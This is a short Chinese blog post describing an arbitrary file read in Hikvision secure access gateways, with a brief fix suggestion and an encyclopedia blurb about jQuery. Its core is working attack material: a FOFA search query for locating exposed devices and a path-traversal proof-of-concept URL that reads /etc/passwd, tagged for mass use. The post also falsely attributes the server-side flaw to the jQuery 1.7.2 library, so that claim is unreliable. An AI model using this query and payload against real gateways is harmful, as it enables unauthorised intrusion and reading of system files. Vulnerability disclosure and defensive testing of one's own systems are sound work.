|
声明:本文提供的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。 |
背景海康威视安全接入网关使用jquery-1.7.2JavaScript代码库(框架),jQuery 1.7.2版本存在任意文件读取漏洞。影响范围jquery-1.7.2FOFA:
body="webui/js/jquerylib/jquery-1.7.2.min.js"
漏洞复现
POC:
/webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down
除此之外,像安博通深度安全网关等使用jquery-1.7.2 JavaScript代码库(框架)的设备同样存在此漏洞
修复建议
临时修复:在防火墙中添加../../参数及相关变形的过滤规则。
goby&nuclei检测
左上角公众号回复“jquery-1.7.2”获取,供运维人员用于检测。
最后附百度百科:
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。jQuery设计的宗旨是“write Less,Do More”,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。
jQuery的核心特性可以总结为:具有独特的链式语法和短小清晰的多功能接口;具有高效灵活的CSS选择器,并且可对CSS选择器进行扩展;拥有便捷的插件扩展机制和丰富的插件。jQuery兼容各种主流浏览器,如IE 6.0+、FF 1.5+、Safari 2.0+、Opera 9.0+等。 [1]
标签:jQuery,jquery,1.7,..,威视,接入网,JavaScript,通杀,漏洞 From: https://www.cnblogs.com/xiaoyunxiaogang/p/17926509.html